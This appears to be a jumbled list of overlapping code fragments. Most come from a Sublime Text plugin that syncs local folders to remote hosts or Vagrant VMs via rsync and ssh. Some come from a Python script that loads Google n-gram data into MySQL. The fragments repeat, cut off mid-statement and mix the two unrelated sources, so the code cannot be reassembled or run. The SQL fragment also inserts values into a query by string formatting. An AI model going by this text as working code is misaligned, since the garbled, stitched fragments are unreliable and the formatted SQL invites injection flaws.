"add_remote_async(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput)",
"import sublime import sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api",
"if callback is not None: callback(settings) remotePath = \"\" found = sublime_api.project_by_path(w, path)",
"o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\"))",
"if len(vms) == 2: sublime_api.error_message(\"No vagrant VMs found\") return False if len(vms) ==",
"add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True",
"lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\",",
"== -1: return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return False",
"len(more) == 2: host = more[1] else: host = more[0] if host ==",
"path\", path) w = sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput) ==",
"found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\")))",
"if found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\",",
"options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options, None, None) # =============================================================================",
"= sublime_api.project_by_path(w, path) if found is not None and found[\"remotePath\"] != \"\": remotePath",
"return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener):",
"w = sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput) == 0: do_it(\"\",",
"is not None and found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync",
"found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\" def on_post_save_async(self,",
"more[0] if host == \"vagrant\": vms = [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if",
"= sublime.active_window() found = sublime_api.project_by_path(w, path) if found is None or found[\"remotePath\"] ==",
"run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path, callback): print(\"Local path\", path)",
"commands provided by remote.\"\"\" import os import re import sys import sublime import",
"do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path,",
"do_it(userInput) return True def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if",
"path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\",",
"sublime import sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import",
"remote path you\" + \" entered\") return False elif len(more) == 2: host",
"if len(userInput) == 0: do_it(\"\", \"\") return True parts = userInput.split(\":\") if len(parts)",
"[\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No vagrant VMs found\")",
"return False print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions",
"rsync options:\", options, done_with_options, None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new",
"0) def rsync_options(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_options(userInput): print(\"Options\",",
"filename = view.file_name() w = sublime.active_window() found = sublime_api.project_by_path(w, filename) if found is",
"# -*- coding: utf-8 -*- # # Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE",
"vms, userSelection): if userSelection == -1: return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm",
"sublime_api.project_by_path(w, path) if found is not None and found[\"remotePath\"] != \"\": remotePath =",
"def to_remote_async(path): print(\"To local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path)",
"do_it(userInput, \"\") return True def done_with_vm(remotePath, vms, userSelection): if userSelection == -1: return",
"a new remote path to a local project path.\"\"\" def run(self, edit, paths):",
"import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import remote.sync_api as sync_api",
"= parts[0].split(\"@\") host = \"\" if len(more) > 2: sublime_api.error_message(\"Unable to parse the",
"= vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return False print(\"VM selected\", vm) sshOptions =",
"sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions != \"\": do_it(remotePath, sshOptions) def",
"sys import sublime import sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as",
"{\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings)",
"import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import remote.sync_api as sync_api import remote.vagrant_api",
"None), 0) def rsync_options(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_options(userInput):",
"found = sublime_api.project_by_path(w, path) if found is None or found[\"remotePath\"] == \"\": add_remote_async(path,",
"\"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True",
"\"\"\"Sync a local directory from a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda:",
"vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for Remote.\"\"\" def run(self,",
"= more[1] else: host = more[0] if host == \"vagrant\": vms = [\"Select",
"found = sublime_api.project_by_path(w, path) if found is not None and found[\"rsyncOptions\"] != \"\":",
"import os import re import sys import sublime import sublime_plugin import subprocess import",
"by remote.\"\"\" import os import re import sys import sublime import sublime_plugin import",
"import re import sys import sublime import sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__)))",
"3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput,",
"path) if found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(",
"============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path to a local project path.\"\"\"",
"2: sublime_api.error_message(\"Unable to parse the remote path you\" + \" entered\") return False",
"\"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change",
"path to a local project path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None),",
"w = sublime.active_window() found = sublime_api.project_by_path(w, path) if found is None or found[\"remotePath\"]",
"None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"), filename, found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\"))",
"local directory from a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0)",
"if callback is not None: callback(settings) options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path)",
"= {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) options",
"to_remote_async(path): print(\"To local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path) if",
"= sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput) == 0: do_it(\"\", \"\")",
"sublime_api.error_message(\"Unable to parse the remote path you\" + \" entered\") return False elif",
"\"\"\"Sync a local directory to a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda:",
"local directory to a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0)",
"vagrant VMs found\") return False if len(vms) == 3: done_with_vm(userInput, vms, 2) else:",
"options, done_with_options, None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path",
"return False if len(vms) == 3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1:",
"return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # =============================================================================",
"local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path) if found is",
"sublime.active_window() found = sublime_api.project_by_path(w, path) if found is None or found[\"remotePath\"] == \"\":",
"return False more = parts[0].split(\"@\") host = \"\" if len(more) > 2: sublime_api.error_message(\"Unable",
"= view.file_name() w = sublime.active_window() found = sublime_api.project_by_path(w, filename) if found is None:",
"w = sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return",
"= more[0] if host == \"vagrant\": vms = [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms)",
"path, settings) if callback is not None: callback(settings) remotePath = \"\" found =",
"lambda i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\") return True def done_with_vm(remotePath, vms,",
"found = sublime_api.project_by_path(w, path) if found is not None and found[\"remotePath\"] != \"\":",
"host = more[0] if host == \"vagrant\": vms = [\"Select VM below...\", \"---\"]",
"import remote.sync_api as sync_api import remote.vagrant_api as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override",
"VMs found\") return False if len(vms) == 3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms,",
"sshOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) remotePath = \"\"",
"callback(settings) remotePath = \"\" found = sublime_api.project_by_path(w, path) if found is not None",
"True def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback is",
"+ \" appear to contain a host\") return False more = parts[0].split(\"@\") host",
"host = \"\" if len(more) > 2: sublime_api.error_message(\"Unable to parse the remote path",
"class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\" def on_post_save_async(self, view): filename = view.file_name()",
"True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class",
"return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return False print(\"VM selected\",",
"sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync",
"found is not None and found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these",
"return False elif len(more) == 2: host = more[1] else: host = more[0]",
"path) if found is not None and found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"]",
"\"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) #",
"is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\",",
"# ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\" def on_post_save_async(self, view): filename",
"module implements the Sublime Text 3 commands provided by remote.\"\"\" import os import",
"as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for Remote.\"\"\" def",
"Text 3 commands provided by remote.\"\"\" import os import re import sys import",
"appear to contain a host\") return False more = parts[0].split(\"@\") host = \"\"",
"out.\"\"\" def on_post_save_async(self, view): filename = view.file_name() w = sublime.active_window() found = sublime_api.project_by_path(w,",
"def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path, callback): print(\"Local path\",",
"None: return False print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if",
"== \"vagrant\": vms = [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2:",
"None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from a remote directory.\"\"\"",
"threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import remote.sync_api as sync_api import remote.vagrant_api as",
"\"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\" def",
"3 commands provided by remote.\"\"\" import os import re import sys import sublime",
"remote path to a local project path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0],",
"userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True def do_it(rsyncOptions):",
"run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path, callback): print(\"Local path\", path)",
"2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime Text 3 commands provided",
"rsync options for Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def",
"remote folder:\", remotePath, done_with_folder, None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local",
"len(userInput) == 0: do_it(\"\", \"\") return True parts = userInput.split(\":\") if len(parts) !=",
"to contain a host\") return False more = parts[0].split(\"@\") host = \"\" if",
"== 3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i)) else:",
"rsync_options(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if",
"def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback is not",
"you\" + \" entered\") return False elif len(more) == 2: host = more[1]",
"# http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime Text 3 commands provided by remote.\"\"\"",
"\"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a",
"if found is not None and found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use",
"= sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if found is not None and found[\"rsyncOptions\"]",
"sublime_api.show_input_panel(\"Sync this folder to remote folder:\", remotePath, done_with_folder, None, None) # ============================================================================= class",
"done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput) == 0: do_it(\"\", \"\") return True parts",
"found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote folder:\", remotePath,",
"directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local path\",",
"done_with_vm(remotePath, vms, userSelection): if userSelection == -1: return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if",
"None and found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options,",
"0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions}",
"class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from a remote directory.\"\"\" def run(self, edit,",
"2: sublime_api.error_message(\"No vagrant VMs found\") return False if len(vms) == 3: done_with_vm(userInput, vms,",
"os import re import sys import sublime import sublime_plugin import subprocess import threading",
"def done_with_vm(remotePath, vms, userSelection): if userSelection == -1: return False vm = vagrant_api.parse_vm_id(vms[userSelection])",
"\"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory",
"to parse the remote path you\" + \" entered\") return False elif len(more)",
"\"\"\"Map a new remote path to a local project path.\"\"\" def run(self, edit,",
"parts[0].split(\"@\") host = \"\" if len(more) > 2: sublime_api.error_message(\"Unable to parse the remote",
"coding: utf-8 -*- # # Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module",
"callback(settings) options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if found is not None",
"# # Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime",
"sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path, callback): print(\"Local path\", path) w = sublime.active_window()",
"Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path, callback): print(\"Local",
"paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path, callback): print(\"Local path\", path) w =",
"done_with_options, None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path to",
"folder:\", remotePath, done_with_folder, None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory",
"= sublime_api.project_by_path(w, filename) if found is None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"), filename,",
"a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To",
"host\") return False more = parts[0].split(\"@\") host = \"\" if len(more) > 2:",
"= found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote folder:\", remotePath, done_with_folder, None, None) #",
"path) w = sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options())",
"\"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) remotePath =",
"sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import remote.sync_api as",
"else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\") return True def",
"found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"),",
"to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local path\", path) w = sublime.active_window() found =",
"o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"),",
"sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local path\", path) w = sublime.active_window() found",
"found = sublime_api.project_by_path(w, filename) if found is None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"),",
"\"\" found = sublime_api.project_by_path(w, path) if found is not None and found[\"remotePath\"] !=",
"False if len(vms) == 3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput,",
"VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No vagrant VMs found\") return"
] |
[
"db='n_grams', # charset='utf8') # cursor = db.cursor() # ngram_stop = 622009+5 # count",
"# if count > (622009+5): # break # if count >=6 and count",
"# ngram_1 # try: # db = pymysql.connect(host='127.0.0.1', # port=3306, # user='root', #",
"ngram_1 # try: # db = pymysql.connect(host='127.0.0.1', # port=3306, # user='root', # password='<PASSWORD>',",
"<= (622009+5): # ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8')",
"ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except Exception as",
"= db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in file: count",
"charset='utf8') # cursor = db.cursor() # ngram_stop = 622009+5 # count = 0",
"after_word, possibility, punishment) cursor.execute(sql) except Exception as ex: db.rollback() traceback.print_exc() finally: db.commit() cursor.close()",
"VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except Exception as ex: db.rollback() traceback.print_exc() finally:",
"pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered')",
"count +1 if count >=622017 and count <= 213054597: content = line.split('\\t') possibility",
"charset='utf8') cursor = db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in",
"import main import traceback import pymysql if __name__ == \"__main__\": # # ngram_1",
"= count +1 if count >=622017 and count <= 213054597: content = line.split('\\t')",
"if __name__ == \"__main__\": # # ngram_1 # try: # db = pymysql.connect(host='127.0.0.1',",
"for line in file: # count = count + 1 # if count",
"line in file: # count = count + 1 # if count >",
"password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for",
"possibility, punishment) cursor.execute(sql) except Exception as ex: db.rollback() traceback.print_exc() finally: db.commit() cursor.close() db.close()",
"= pymysql.connect(host='127.0.0.1', # port=3306, # user='root', # password='<PASSWORD>', # db='n_grams', # charset='utf8') #",
"words = content[1] content = words.split(' ') under_word = content[0] after_word = content[1]",
"# user='root', # password='<PASSWORD>', # db='n_grams', # charset='utf8') # cursor = db.cursor() #",
"(622009+5): # ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor",
"213054597: content = line.split('\\t') possibility = content[0] words = content[1] content = words.split('",
"db='n_grams', charset='utf8') cursor = db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line",
"+ 1 # if count > (622009+5): # break # if count >=6",
"in file: # count = count + 1 # if count > (622009+5):",
"> (622009+5): # break # if count >=6 and count <= (622009+5): #",
"= '-99' sql = 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES",
"pymysql if __name__ == \"__main__\": # # ngram_1 # try: # db =",
"with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in file: count = count +1 if",
"# if count >=6 and count <= (622009+5): # ngram_2 try: db =",
"traceback import pymysql if __name__ == \"__main__\": # # ngram_1 # try: #",
"# '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: # for line in file: # count",
"with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: # for line in file:",
"# ) as file: # for line in file: # count = count",
"user='root', # password='<PASSWORD>', # db='n_grams', # charset='utf8') # cursor = db.cursor() # ngram_stop",
"content[1] content = words.split(' ') under_word = content[0] after_word = content[1] punishment =",
"line in file: count = count +1 if count >=622017 and count <=",
"') under_word = content[0] after_word = content[1] punishment = '-99' sql = 'insert",
"# try: # db = pymysql.connect(host='127.0.0.1', # port=3306, # user='root', # password='<PASSWORD>', #",
">=622017 and count <= 213054597: content = line.split('\\t') possibility = content[0] words =",
"ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor()",
"db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in file: count =",
"password='<PASSWORD>', # db='n_grams', # charset='utf8') # cursor = db.cursor() # ngram_stop = 622009+5",
"ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except",
"db.cursor() # ngram_stop = 622009+5 # count = 0 # with open( #",
"and count <= (622009+5): # ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>',",
"content[1] punishment = '-99' sql = 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment",
"if count >=6 and count <= (622009+5): # ngram_2 try: db = pymysql.connect(host='127.0.0.1',",
"count = count +1 if count >=622017 and count <= 213054597: content =",
"<filename>insert_data.py import main import traceback import pymysql if __name__ == \"__main__\": # #",
"'-99' sql = 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word,",
"# # ngram_1 # try: # db = pymysql.connect(host='127.0.0.1', # port=3306, # user='root',",
"count + 1 # if count > (622009+5): # break # if count",
"count <= 213054597: content = line.split('\\t') possibility = content[0] words = content[1] content",
"= words.split(' ') under_word = content[0] after_word = content[1] punishment = '-99' sql",
"content = line.split('\\t') possibility = content[0] words = content[1] content = words.split(' ')",
"__name__ == \"__main__\": # # ngram_1 # try: # db = pymysql.connect(host='127.0.0.1', #",
"under_word = content[0] after_word = content[1] punishment = '-99' sql = 'insert into",
"# count = count + 1 # if count > (622009+5): # break",
"( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except Exception",
"(\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except Exception as ex: db.rollback() traceback.print_exc() finally: db.commit()",
">=6 and count <= (622009+5): # ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root',",
"= 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility,",
"possibility = content[0] words = content[1] content = words.split(' ') under_word = content[0]",
"port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as",
"if count >=622017 and count <= 213054597: content = line.split('\\t') possibility = content[0]",
"as file: # for line in file: # count = count + 1",
"= content[0] after_word = content[1] punishment = '-99' sql = 'insert into ngram_2",
"try: # db = pymysql.connect(host='127.0.0.1', # port=3306, # user='root', # password='<PASSWORD>', # db='n_grams',",
"= content[1] content = words.split(' ') under_word = content[0] after_word = content[1] punishment",
") VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except Exception as ex: db.rollback() traceback.print_exc()",
"+1 if count >=622017 and count <= 213054597: content = line.split('\\t') possibility =",
"=0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in file: count = count +1",
"ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except Exception as ex: db.rollback()",
"after_word = content[1] punishment = '-99' sql = 'insert into ngram_2 ( ngram2_under_word,",
"ngram_stop = 622009+5 # count = 0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' #",
"pymysql.connect(host='127.0.0.1', # port=3306, # user='root', # password='<PASSWORD>', # db='n_grams', # charset='utf8') # cursor",
"file: # count = count + 1 # if count > (622009+5): #",
"import pymysql if __name__ == \"__main__\": # # ngram_1 # try: # db",
"# ngram_stop = 622009+5 # count = 0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered'",
"# ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor =",
"db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor() count =0",
"count = 0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: #",
"count >=6 and count <= (622009+5): # ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306,",
"punishment = '-99' sql = 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment )",
"user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file:",
"# count = 0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file:",
"content = words.split(' ') under_word = content[0] after_word = content[1] punishment = '-99'",
"file: # for line in file: # count = count + 1 #",
"== \"__main__\": # # ngram_1 # try: # db = pymysql.connect(host='127.0.0.1', # port=3306,",
"# break # if count >=6 and count <= (622009+5): # ngram_2 try:",
